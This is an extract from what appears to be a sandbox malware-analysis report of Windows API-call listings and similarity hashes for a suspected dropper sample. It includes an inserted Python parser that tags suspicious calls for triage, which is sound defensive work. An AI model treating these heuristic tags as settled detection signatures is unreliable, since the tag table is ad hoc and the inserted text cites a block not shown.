                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction ID: b38c6f681fe2aa6d319fb9393d35d6ff975801ed07d05bf22e449dc8561ee7b5
                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction Fuzzy Hash: 5C115E71544B04AAD661BFF0CC47FCF7BDCAF02B40F400826B29AA68A3EE65B5058661
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000DDA74
                                        • LoadStringW.USER32(00000000), ref: 000DDA7B
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000DDA91
                                        • LoadStringW.USER32(00000000), ref: 000DDA98
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000DDADC
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 000DDAB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: 38bfebd7f28c793beb0816eca84f0528ab047deb57f8654751d06ba12d2b74fc
                                        • Instruction ID: 043fef8c50e2f5aefe869d6c25d015a8475fa602ecebe0b0b7c5c73e4b236c3e
                                        • Opcode Fuzzy Hash: 38bfebd7f28c793beb0816eca84f0528ab047deb57f8654751d06ba12d2b74fc
                                        • Instruction Fuzzy Hash: 100186F6900308BFE7109BA4DD89EEB376CE708301F404592B746E2181E6B49EC48FB5
                                        APIs
                                        • InterlockedExchange.KERNEL32(0141E690,0141E690), ref: 000E097B
                                        • EnterCriticalSection.KERNEL32(0141E670,00000000), ref: 000E098D
                                        • TerminateThread.KERNEL32(006F0074,000001F6), ref: 000E099B
                                        • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 000E09A9
                                        • CloseHandle.KERNEL32(006F0074), ref: 000E09B8
                                        • InterlockedExchange.KERNEL32(0141E690,000001F6), ref: 000E09C8
                                        • LeaveCriticalSection.KERNEL32(0141E670), ref: 000E09CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: eda9685869198bd1d531d2bd45ea0468648f7a26d89003d24dc80cf96a135a17
                                        • Instruction ID: 6b2b7e9add8db32160d17ed56d72c389510ca0563a6a07590d88c1ecbfe18521
                                        • Opcode Fuzzy Hash: eda9685869198bd1d531d2bd45ea0468648f7a26d89003d24dc80cf96a135a17
                                        • Instruction Fuzzy Hash: CDF0C932442A12ABD7515FA4EE89AD6BA69BF05702F402225F242A4CA1C7B594A5CFD0
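                                         The per-function listings above (for instance the WSOCK32 socket helper at 000F1112 and the TerminateThread shutdown routine at 000E097B) are easier to triage once parsed into structured records, because the report prints every argument as raw 32-bit hex. The following Python is an added example, not part of the Joe Sandbox report or of the IDA plugin; the embedded sample text is copied from those two blocks, while the tag table and the constant decodings (AF_INET / SOCK_STREAM / IPPROTO_TCP for socket, the millisecond timeout for WaitForSingleObject) are assumptions chosen for this example rather than anything the report asserts.

```python
"""Parse Joe Sandbox IDA-plugin function blocks and triage their API calls (added example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two blocks copied from the report layout used on this page.
# Only the lines the parser consumes ("APIs", call lines, Similarity fields) are kept.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 000F304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
  • Part of subcall function 000F304E: _wcslen.LIBCMT ref: 000F309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000F1112
• WSAGetLastError.WSOCK32 ref: 000F1121
• WSAGetLastError.WSOCK32 ref: 000F11C9
• closesocket.WSOCK32(00000000), ref: 000F11F9
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
• Instruction Fuzzy Hash: 9A41CF31600208AFDB109F24C884BE9B7E9FF45324F148159FA599B692C774AD818BE1
APIs
• InterlockedExchange.KERNEL32(0141E690,0141E690), ref: 000E097B
• EnterCriticalSection.KERNEL32(0141E670,00000000), ref: 000E098D
• TerminateThread.KERNEL32(006F0074,000001F6), ref: 000E099B
• WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 000E09A9
• CloseHandle.KERNEL32(006F0074), ref: 000E09B8
• InterlockedExchange.KERNEL32(0141E690,000001F6), ref: 000E09C8
• LeaveCriticalSection.KERNEL32(0141E670), ref: 000E09CF
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Instruction Fuzzy Hash: CDF0C932442A12ABD7515FA4EE89AD6BA69BF05702F402225F242A4CA1C7B594A5CFD0
"""

# One call line: optional "Part of subcall function X:", then API.MODULE(args), ref: ADDR.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[^.\s]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)

@dataclass
class Call:
    api: str
    module: str
    args: list                      # int for hex literals, None for '?'
    ref: int
    subcall_of: Optional[int] = None  # address of the callee when the line is a subcall

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

def parse_args(text: Optional[str]) -> list:
    """Turn '00000002,?,000003E8' into [2, None, 1000]; no parentheses means no args."""
    if not text or not text.strip():
        return []
    return [None if tok.strip() == "?" else int(tok.strip(), 16) for tok in text.split(",")]

def parse_blocks(report: str) -> list:
    """Split the report at each 'APIs' header and collect calls and Similarity fields."""
    blocks, cur = [], None
    for line in report.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append(Call(api=m["api"], module=m["mod"], args=parse_args(m["args"]),
                                  ref=int(m["ref"], 16),
                                  subcall_of=int(m["sub"], 16) if m["sub"] else None))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()
    return blocks

# Heuristic tag table for a compiled-AutoIt dropper; an assumption for this example,
# not a Joe Sandbox signature.
INTERESTING = {
    "socket": "network", "inet_addr": "network", "closesocket": "network",
    "TerminateThread": "forced-thread-stop",
    "CreatePipe": "child-stdio-redirect", "GetStdHandle": "child-stdio-redirect",
    "SHFileOperationW": "bulk-file-op", "MoveFileW": "bulk-file-op",
}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

def describe(call: Call) -> str:
    """Decode the constants the report leaves as raw hex for a few well-known APIs."""
    a = call.args
    if call.api == "socket" and len(a) >= 3:
        return f"socket({AF.get(a[0], a[0])}, {SOCK.get(a[1], a[1])}, {PROTO.get(a[2], a[2])})"
    if call.api == "WaitForSingleObject" and len(a) >= 2 and a[1] is not None:
        return f"WaitForSingleObject(timeout={a[1]} ms)"
    return call.api

def triage(blocks: list) -> list:
    """Per block: sorted tags hit, decoded call strings, and the fuzzy hash for pivoting."""
    return [{"tags": sorted({INTERESTING[c.api] for c in b.calls if c.api in INTERESTING}),
             "calls": [describe(c) for c in b.calls],
             "fuzzy": b.fields.get("Instruction Fuzzy Hash", "")} for b in blocks]

if __name__ == "__main__":
    for i, entry in enumerate(triage(parse_blocks(SAMPLE_REPORT))):
        print(i, entry["tags"], entry["calls"])
```

                                         Feeding the whole Windows Analysis Report through parse_blocks gives one record per function with its Instruction Fuzzy Hash attached, which is the field to pivot on when comparing this sample against other compiled-AutoIt droppers; the tag table is deliberately small and should be extended for the behaviour being hunted.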
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00075D30
                                        • GetWindowRect.USER32(?,?), ref: 00075D71
                                        • ScreenToClient.USER32(?,?), ref: 00075D99
                                        • GetClientRect.USER32(?,?), ref: 00075ED7
                                        • GetWindowRect.USER32(?,?), ref: 00075EF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: 07fcf2d4654afc54ceba3b58349b0c457af8e5e62e13aa5c32f9657ec51e6ebb
                                        • Instruction ID: 672477b402fba95e2598678bbde5f182ea3cde2e578b6c685185d5590a21b217
                                        • Opcode Fuzzy Hash: 07fcf2d4654afc54ceba3b58349b0c457af8e5e62e13aa5c32f9657ec51e6ebb
                                        • Instruction Fuzzy Hash: 97B18834A00B4ADBDB24CFA9C8807EEB7F1FF58311F14851AE8A9D7250DB74AA50CB54
                                        APIs
                                        • __allrem.LIBCMT ref: 000A00BA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A00D6
                                        • __allrem.LIBCMT ref: 000A00ED
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A010B
                                        • __allrem.LIBCMT ref: 000A0122
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A0140
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                        • Instruction ID: 39f5e06f75150f7374bc9dc450c398ef450c8598270dc1b9e7a9dc690a7deec7
                                        • Instruction Fuzzy Hash: 2381F772A0070A9BEB209FA8CC51BEB73E9AF42364F24453AF551D7282E770D9009B50
                                        APIs
                                          • Part of subcall function 000F3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,000F101C,00000000,?,?,00000000), ref: 000F3195
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000F1DC0
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000F1DE1
                                        • WSAGetLastError.WSOCK32 ref: 000F1DF2
                                        • inet_ntoa.WSOCK32(?), ref: 000F1E8C
                                        • htons.WSOCK32(?,?,?,?,?), ref: 000F1EDB
                                        • _strlen.LIBCMT ref: 000F1F35
                                          • Part of subcall function 000D39E8: _strlen.LIBCMT ref: 000D39F2
                                          • Part of subcall function 00076D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0008CF58,?,?,?), ref: 00076DBA
                                          • Part of subcall function 00076D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0008CF58,?,?,?), ref: 00076DED
                                        Similarity
                                        • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 1923757996-0
                                        • Opcode ID: 1f66263d00d6df6cd2042a0cca35052bb3ec7d46d5eedae6d535b038153c3bcc
                                        • Instruction ID: acc33f4e46fb0f988321aa34ecb745442c588b5c7815fae5f8c5567ec4a710e6
                                        • Instruction Fuzzy Hash: EDA1CE30504344AFC324EB20C885FBA77E5AF84318F54895CF59A5B6A3CB71ED46CB92
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000982D9,000982D9,?,?,?,000A644F,00000001,00000001,8BE85006), ref: 000A6258
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000A644F,00000001,00000001,8BE85006,?,?,?), ref: 000A62DE
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000A63D8
                                        • __freea.LIBCMT ref: 000A63E5
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        • __freea.LIBCMT ref: 000A63EE
                                        • __freea.LIBCMT ref: 000A6413
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: aec5bb244701bd029a257a4bb1af0bed96e4a2c40711cda1ae595cad98daf53b
                                        • Instruction ID: fe9e2ca16c57dfb18875d28ddc9c5bb03bb8f40586f34739ca9ead4a521f9175
                                        • Instruction Fuzzy Hash: 5951BE72A00216ABDF258FE4CC81EAF76FAEF46750F184629F905D6181EB36DD41C6A0
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FBCCA
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000FBD25
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FBD6A
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000FBD99
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000FBDF3
                                        • RegCloseKey.ADVAPI32(?), ref: 000FBDFF
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                        • String ID:
                                        • API String ID: 1120388591-0
                                        • Opcode ID: 75177f63d9d378b5f8c95b6cdb3ac5829bc340d72e3cad02c684b1cbf23d61bf
                                        • Instruction ID: 3636648c8bdc3fbf227887d63335b903033aadc206b762cc06966dfc8559368c
                                        • Instruction Fuzzy Hash: B3819B30208245AFD714DF24C881E6ABBE5FF84308F14895CF6994B6A2DB71ED45DF92
                                        APIs
                                        • VariantInit.OLEAUT32(00000035), ref: 000CF7B9
                                        • SysAllocString.OLEAUT32(00000001), ref: 000CF860
                                        • VariantCopy.OLEAUT32(000CFA64,00000000), ref: 000CF889
                                        • VariantClear.OLEAUT32(000CFA64), ref: 000CF8AD
                                        • VariantCopy.OLEAUT32(000CFA64,00000000), ref: 000CF8B1
                                        • VariantClear.OLEAUT32(?), ref: 000CF8BB
                                        Similarity
                                        • API ID: Variant$ClearCopy$AllocInitString
                                        • String ID:
                                        • API String ID: 3859894641-0
                                        • Opcode ID: 54089bbbe3bbf0944dbc5ea294d27265376117b89a04ef5f397133b2ded6ef72
                                        • Instruction ID: 6dbacc1f289bb87c6fe341185c792ec53dc9fb1b76ca37d80e7cf9d66c241334
                                        • Instruction Fuzzy Hash: 2451D431600312BBCF24AB65D895F7DB3A6EF45310B20946BE906DF292DB748C40DB97
                                        APIs
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 000E94E5
                                        • _wcslen.LIBCMT ref: 000E9506
                                        • _wcslen.LIBCMT ref: 000E952D
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 000E9585
                                        Strings
                                        Similarity
                                        • API ID: _wcslen$FileName$OpenSave
                                        • String ID: X
                                        • API String ID: 83654149-3081909835
                                        • Opcode ID: d6f818077af360a2bc58fde8d604382120b659808ad54d7648349b86375f09bc
                                        • Instruction ID: e37df46aa2b4503165939de06d22db14bd0ec86e4ce8ef5ee7dcf2ed86e49bbb
                                        • Instruction Fuzzy Hash: CBE1B2719083409FD724DF25C881BAEB7E0BF85314F14896DF899AB2A2DB31DD45CB92
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • BeginPaint.USER32(?,?,?), ref: 00089241
                                        • GetWindowRect.USER32(?,?), ref: 000892A5
                                        • ScreenToClient.USER32(?,?), ref: 000892C2
                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000892D3
                                        • EndPaint.USER32(?,?,?,?,?), ref: 00089321
                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000C71EA
                                          • Part of subcall function 00089339: BeginPath.GDI32(00000000), ref: 00089357
                                        Similarity
                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                        • String ID:
                                        • API String ID: 3050599898-0
                                        • Opcode ID: 0a896ae99e82554cc735bf158aa2e6f91df40d757921ad0df82b2f3cdf3080c9
                                        • Instruction ID: 573c869e12c74a721eb93d570ba6232878f738fdebe1a3c5251d99b6315cf218
                                        • Instruction Fuzzy Hash: 9C419F70105200AFD721EF24DC84FBA7BE8FB56324F180669F9A5872F2C7719985DB61
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 000E080C
                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000E0847
                                        • EnterCriticalSection.KERNEL32(?), ref: 000E0863
                                        • LeaveCriticalSection.KERNEL32(?), ref: 000E08DC
                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000E08F3
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 000E0921
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3368777196-0
                                        • Opcode ID: 8fe5f0cea5b3b02575d9781545cf2519ada885f9ee8eab7892a6ffc12e07968e
                                        • Instruction ID: ffe2a991d6dee6f013d835cc9b63b191053dcab8dc38a72ec969b4102d04d94a
                                        • Instruction Fuzzy Hash: A7417A71900205EFDF14AF64DC85AAAB7B8FF44300F1440A5ED40AA297DBB0DEA4DFA0
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,000CF3AB,00000000,?,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 0010824C
                                        • EnableWindow.USER32(00000000,00000000), ref: 00108272
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001082D1
                                        • ShowWindow.USER32(00000000,00000004), ref: 001082E5
                                        • EnableWindow.USER32(00000000,00000001), ref: 0010830B
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0010832F
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID:
                                        • API String ID: 642888154-0
                                        • Opcode ID: a2affd3f9faf9d9a6a61cd88e557c00f8dc41a14de492355c21c0093dfab69d7
                                        • Instruction ID: 3ea0cb1dc05ad034c1adcf6854546cb6dd12bec8fb97115265e58fe9be4e7538
                                        • Instruction Fuzzy Hash: 2C417D34605644AFDF21CF15C899BE47BE1BB4A714F1852A9E6C84F6F2CBB1A881CF50
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 000D4C95
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000D4CB2
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000D4CEA
                                        • _wcslen.LIBCMT ref: 000D4D08
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000D4D10
                                        • _wcsstr.LIBVCRUNTIME ref: 000D4D1A
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                        • String ID:
                                        • API String ID: 72514467-0
                                        • Opcode ID: b1249965ba32c15966279e12187a09c55d42047d2e0e8d821cf2aba1e582e31b
                                        • Instruction ID: 9511553b699eb1a55205ca7e3d9fc32954a6078431bcdb19ffb68228598913d8
                                        • Instruction Fuzzy Hash: 3321C272204305BBEB655B39AC49EBB7BDDDF45750F10812AF809CA292EAB1DC4196B0
                                        APIs
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                        • _wcslen.LIBCMT ref: 000E587B
                                        • CoInitialize.OLE32(00000000), ref: 000E5995
                                        • CoCreateInstance.OLE32(0010FCF8,00000000,00000001,0010FB68,?), ref: 000E59AE
                                        • CoUninitialize.OLE32 ref: 000E59CC
                                        Strings
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: bd8fecd69f09dadb641929ef73525629f502f8433df7eadb3d8b0cd85a20f1c5
                                        • Instruction ID: 445c55a5bb36202d42eccdbea2dd960f4c68b55dc85f324d372a5d05f820ff1e
                                        • Instruction Fuzzy Hash: 32D16470A047019FC714DF25C880A6ABBE1FF89719F14895DF889AB362DB31EC45CB92
                                        APIs
                                          • Part of subcall function 000D0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000D0FCA
                                          • Part of subcall function 000D0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000D0FD6
                                          • Part of subcall function 000D0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000D0FE5
                                          • Part of subcall function 000D0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000D0FEC
                                          • Part of subcall function 000D0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000D1002
                                        • GetLengthSid.ADVAPI32(?,00000000,000D1335), ref: 000D17AE
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000D17BA
                                        • HeapAlloc.KERNEL32(00000000), ref: 000D17C1
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 000D17DA
                                        • GetProcessHeap.KERNEL32(00000000,00000000,000D1335), ref: 000D17EE
                                        • HeapFree.KERNEL32(00000000), ref: 000D17F5
                                        Similarity
                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 3008561057-0
                                        • Opcode ID: ac904c04eb1473363cd3da847ec81d5db5e24f72195419ef147e067f88139f27
                                        • Instruction ID: d12df335ca4554dad81ef16389f251ff4e50c385a724e8d5772c4cfaa72e840b
                                        • Opcode Fuzzy Hash: ac904c04eb1473363cd3da847ec81d5db5e24f72195419ef147e067f88139f27
                                        • Instruction Fuzzy Hash: 7E116A71605305FBDB109FA4CC49BEE7BB9FB45355F10425AF48197220DB75A984CBA0
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000D14FF
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000D1506
                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000D1515
                                        • CloseHandle.KERNEL32(00000004), ref: 000D1520
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000D154F
                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 000D1563
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        • Opcode ID: c6f70084394b91afa322cb36ab22988a7b1e87e58e2bdf6a5996c5c15194281a
                                        • Instruction ID: 89239ed86c7a470522b6993ac9a1013ee92c5bdb50f45580762339effd1a4d2f
                                        • Opcode Fuzzy Hash: c6f70084394b91afa322cb36ab22988a7b1e87e58e2bdf6a5996c5c15194281a
                                        • Instruction Fuzzy Hash: 84112972500209FBDF118F98ED49BDE7BA9FF48744F048115FA45A21A0C7B58EA0DBA0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00093379,00092FE5), ref: 00093390
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0009339E
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000933B7
                                        • SetLastError.KERNEL32(00000000,?,00093379,00092FE5), ref: 00093409
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: e0b7bb2ac9b89a65c742ceaa5506df81cb37d22dd1f294e54cfec783c4e9ed69
                                        • Instruction ID: 086a9038020b77ce7fcca14babae2f60dda24db0ede0b4bfa2817e296a3b2c6d
                                        • Opcode Fuzzy Hash: e0b7bb2ac9b89a65c742ceaa5506df81cb37d22dd1f294e54cfec783c4e9ed69
                                        • Instruction Fuzzy Hash: EE01243260D311BEEF2827B47C859AB2A94EB053793208329F510942F2EF114E427E84
                                        APIs
                                        • GetLastError.KERNEL32(?,?,000A5686,000B3CD6,?,00000000,?,000A5B6A,?,?,?,?,?,0009E6D1,?,00138A48), ref: 000A2D78
                                        • _free.LIBCMT ref: 000A2DAB
                                        • _free.LIBCMT ref: 000A2DD3
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0009E6D1,?,00138A48,00000010,00074F4A,?,?,00000000,000B3CD6), ref: 000A2DE0
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0009E6D1,?,00138A48,00000010,00074F4A,?,?,00000000,000B3CD6), ref: 000A2DEC
                                        • _abort.LIBCMT ref: 000A2DF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
